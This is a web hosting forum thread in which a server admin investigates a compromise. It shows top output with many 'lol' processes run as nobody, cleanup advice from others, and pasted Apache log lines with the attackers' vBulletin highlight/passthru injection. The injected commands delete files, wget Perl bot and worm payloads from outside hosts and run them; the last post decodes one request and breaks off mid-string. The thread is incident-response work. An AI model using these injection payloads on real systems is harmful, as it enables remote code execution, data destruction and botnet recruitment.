Results 1 to 11 of 11
  1. #1
    Join Date
    Sep 2003
    Location
    UK
    Posts
    342

    Process running as nobody

    Hi all,

    Below is a copy of my top

    Code:
    12:14:26  up 50 days, 59 min,  1 user,  load average: 0.39, 0.42, 0.59
    257 processes: 252 sleeping, 1 running, 0 zombie, 4 stopped
    CPU states:  15.2% user   5.5% system   0.0% nice   0.0% iowait  79.1% idle
    Mem:   514196k av,  502628k used,   11568k free,       0k shrd,  112768k buff
           156332k active,             310968k inactive
    Swap: 2104504k av,  196156k used, 1908348k free                  145632k cached
    
      PID USER     PRI  NI  SIZE  RSS SHARE STAT %CPU %MEM   TIME CPU COMMAND
     2465 root      19   0  1184 1184   804 R     5.5  0.2   0:01   0 top
    31482 nobody    10   0   608  604   548 S     1.3  0.1   0:10   0 ./lol 30
     1089 root      19  19 33184  13M 10400 S N   0.9  2.7  1646m   0 ./server_linux -PID=tsserver2.pid
    28521 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
    28523 nobody    10   0   576  572   516 S     0.9  0.1   0:05   0 ./lol 30
    19621 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
    20010 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
    20014 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
    20028 nobody     9   0   620  616   560 S     0.4  0.1   0:13   0 ./lol 30
    20469 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
    20610 nobody     9   0   620  616   560 S     0.4  0.1   0:12   0 ./lol 30
    22113 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
    23021 nobody     9   0   608  604   548 S     0.4  0.1   0:10   0 ./lol 30
    23096 nobody     9   0   604  600   544 S     0.4  0.1   0:10   0 ./lol 30
    23497 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
    23506 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
    24227 nobody     9   0   604  600   544 S     0.4  0.1   0:09   0 ./lol 30
    24229 nobody     9   0   600  596   540 S     0.4  0.1   0:09   0 ./lol 30
    25163 nobody     9   0   596  592   536 S     0.4  0.1   0:08   0 ./lol 30
    26179 nobody     9   0   584  580   524 S     0.4  0.1   0:07   0 ./lol 30
    26561 nobody     9   0   584  580   524 S     0.4  0.1   0:06   0 ./lol 30
    27201 nobody     9   0   580  576   520 S     0.4  0.1   0:06   0 ./lol 30
    28045 nobody     9   0   576  572   516 S     0.4  0.1   0:06   0 ./lol 30
    28381 nobody     9   0   576  572   516 S     0.4  0.1   0:05   0 ./lol 30
    28529 nobody     9   0   528  524   464 S     0.4  0.1   0:08   0 ./lol 30
    28634 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
    28860 nobody     9   0   524  520   460 S     0.4  0.1   0:08   0 ./lol 30
    30670 nobody     9   0   544  540   484 S     0.4  0.1   0:01   0 ./lol 30
    31106 nobody     9   0   612  608   552 S     0.4  0.1   0:11   0 ./lol 30
    31254 nobody     9   0   608  604   548 S     0.4  0.1   0:11   0 ./lol 30
        1 root       8   0   472  440   424 S     0.0  0.0   0:58   0 init [3]
        2 root       9   0     0    0     0 SW    0.0  0.0   0:01   0 keventd
        3 root       9   0     0    0     0 SW    0.0  0.0   2:32   0 kapmd
        4 root      19  19     0    0     0 SWN   0.0  0.0   0:00   0 ksoftirqd_CPU0
        5 root       9   0     0    0     0 SW    0.0  0.0   7:31   0 kswapd
        6 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 bdflush
        7 root       9   0     0    0     0 SW    0.0  0.0   2:02   0 kupdated
        8 root     18446744073709551615 -20     0    0     0 SW<   0.0  0.0   0:00   0 mdrecoveryd
       58 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 khubd
      277 root       9   0     0    0     0 SW    0.0  0.0   0:00   0 kjournald
      278 root       9   0     0    0     0 SW    0.0  0.0   4:17   0 kjournald
      279 root       9   0     0    0     0 SW    0.0  0.0   1:25   0 kjournald
      280 root       9   0     0    0     0 SW    0.0  0.0   6:15   0 kjournald
      281 root       9   0     0    0     0 SW    0.0  0.0   3:22   0 kjournald
      750 root       9   0   556  520   476 S     0.0  0.1   3:41   0 syslogd -m 0
      754 root       9   0   420  368   368 S     0.0  0.0   0:00   0 klogd -x
     4411 root       9   0   984  776   776 S     0.0  0.1   0:00   0 /bin/bash
     4414 root       9   0   940  804   788 S     0.0  0.1   0:38   0 /usr/sbin/sshd
     4428 root       8   0   752  668   620 S     0.0  0.1   0:04   0 xinetd -stayalive -pidfile /var/run/xinetd.pid
     4670 root       8   0   580  568   524 S     0.0  0.1   0:18   0 crond
    I have just noticed that ./lol 30 scripts being run as nobody.
    I have checked /tmp (which is non-executable) /var/tmp (again the same) and have just checked /dev/shm (which isnt non-executable)

    I removed a few files from there.
    I have tried killing the processes however more seem to appear.

    Can anyone help?

    Thanks
    Centation Web Services
    Bristol based web design
    Offering website design, SEO, website hosting, website development and domain registration.

  2. #2
    Try running:

    killall -9 lol

    To find the file you can use:

    locate lol


    You may also want to install and run rkhunter and or chkrootkit.
    crucialparadigm - Affordable, Reliable, Professional :
    Web Hosting
    24/7 Support Web Hosting Reseller Hosting Cloud/VPS Plans Dedicated Servers

  3. #3
    Join Date
    Dec 2004
    Location
    Canada
    Posts
    1,082
    Looks like your box has been exploited.

  4. #4
    Join Date
    Apr 2003
    Location
    UK
    Posts
    2,560
    if i remember correctly, lol is a dosser, and i suspect you'll find your attacker has got in via an insecure webscript (check things like phpbb + coppermine versions).

    check /var/tmp and /tmp for directories such as ". . " and the like

  5. #5
    Join Date
    Nov 2004
    Location
    Dallas
    Posts
    739
    Yep, check tmp or kill all processes running on nobody

  6. #6
    Join Date
    Sep 2003
    Location
    UK
    Posts
    342
    Hi there,

    I have run locate lol before however nothing out of the ordinary comes up. Just a lot of .gif files.
    Im running updatedb and then gonna try locate again to see if anything new comes up.
    I have double checked all directorys and removed some more . folders.

    Does anyone have a URL or any more information on the lol dosser, so i can isolate it and prevent it in the future?

    //EDIT Just found lots of files in /usr/local/apache/proxy

    One dir being Strobe which is a port prober. Also a dir called scan which contains the lol files. Also there is a dir called flood is it safe to remove the dir called flood?

    Also does apache need the folder called proxy? If so what folders does it need? There is also httpd -DSSL in it, is that another trick?

    Thanks
    Last edited by Veus; 01-12-2005 at 11:24 AM.
    Centation Web Services
    Bristol based web design
    Offering website design, SEO, website hosting, website development and domain registration.

  7. #7
    Join Date
    Apr 2003
    Location
    UK
    Posts
    2,560
    ye thats a trick, we've seen the same (hackers?) tools on one of our custoemrs servers repeatedly. Out of interest is this a cpanel server?

    they used a file called httpd -DSSL as well as various other rubbish renaming methods. Also included were psybncs and bots. Most of their stuff they kept in /tmp and /var/tmp although i did find stuff elsewhere. Try looking in your apache logs for wget

  8. #8
    Join Date
    Sep 2003
    Location
    UK
    Posts
    342
    Thats the same as what i found, quite a few psybncs and a few bots. Ill have a look thanks.
    Yea it is a Cpanel server.
    Im running grep - i wget * on my logs now to find which user is being careless!
    Centation Web Services
    Bristol based web design
    Offering website design, SEO, website hosting, website development and domain registration.

  9. #9
    Join Date
    Apr 2003
    Location
    UK
    Posts
    2,560
    we found it was an old version of the coppermine gallery software that was causing the problems (they were running 1.2, and 1.3.something is the latest secure ver)

  10. #10
    Join Date
    Sep 2003
    Location
    UK
    Posts
    342
    After searching for wget in the domlogs i have found the following entries:

    Code:
    /usr/local/apache/domlogs/domain.com:209.126.164.246 - - [01/Jan/2005:21:58:17 +0000] "GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527 HTTP/1.0" 200 47435 "-" "LWP::Simple/5.43"
    /usr/local/apache/domlogs/domain.com:70.84.39.148 - - [02/Jan/2005:09:15:23 +0000] "GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 67361 "-" "LWP::Simple/5.803"
    /usr/local/apache/domlogs/domain.com:203.24.100.137 - - [02/Jan/2005:11:25:51 +0000] "GET /showthread.php?t=9722&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.0" 200 73304 "-" "LWP::Simple/5.64"
    /usr/local/apache/domlogs/domain.com:208.234.15.155 - - [03/Jan/2005:22:47:40 +0000] "GET /printthread.php?t=9849&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527 HTTP/1.1" 200 6881 "-" "LWP::Simple/5.63"
    /usr/local/apache/domlogs/domain.com:193.210.126.79 - - [10/Jan/2005:04:30:31 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.79"
    /usr/local/apache/domlogs/domain.com:209.152.178.80 - - [10/Jan/2005:23:34:51 +0000] "GET /printthread.php?t=471&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2852 "-" "LWP::Simple/5.63"
    /usr/local/apache/domlogs/domain.com:209.152.178.80 - - [11/Jan/2005:07:45:01 +0000] "GET /printthread.php?t=440&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;wget%20%0Asecurity.cnc.net/bot.txt;wget%20security.cnc.net/worm.txt;perl%20%0Aworm.txt;rm%20worm.txt;perl%20%0Abot.txt;rm%20%0Abot.txt%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1" 200 2864 "-" "LWP::Simple/5.63"
    It is a Vbulletin Installation running the latest 3.0.5. Does anyone recognise this pattern?
    Centation Web Services
    Bristol based web design
    Offering website design, SEO, website hosting, website development and domain registration.

  11. #11
    Join Date
    Jun 2003
    Posts
    961
    Code:
    GET /showthread.php?t=9840&rush=echo%20_START_%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20%20/usr/local/apache/proxy/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;killall%20-9%20wget%3B%20echo%20_END_&highlight=%2527.passthru(%24HTTP_GET_VARS%5Brush%5D).%2527
    is
    GET /showthread.php?t=9840&rush=echo _START_; cd /tmp; rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/tmp/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/spool/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd /var/mail/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;cd  /usr/local/apache/proxy/;rm -rf *;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl sess_189f0f0889555397a4de5485dd611111;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl sess_189f0f0889555397a4de5485dd611116;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl sess_189f0f0889555397a4de5485dd611115;wget 65.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl sess_189f0f0889555397a4de5485dd611117;rm -rf *;killall -9 wget; echo _END_&highlight=%2527.passthru($HTTP_GET_VARS[rush]).%2527
    
    GET /showthread.php?t=8240&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;%20rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/tmp/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611111;perl%20sess_189f0f0889555397a4de5485dd611111;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611116;perl%20sess_189f0f0889555397a4de5485dd611116;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611115;perl%20sess_189f0f0889555397a4de5485dd611115;wget%2065.75.133.131/.zk/sess_189f0f0889555397a4de5485dd611117;perl%20sess_189f0f0889555397a4de5485dd611117;rm%20-rf%20*;cd%20/var/spool/mail/;rm%20-rf%20*;wget%2065.75.133.131/.zk/sess_189f0f0889555397a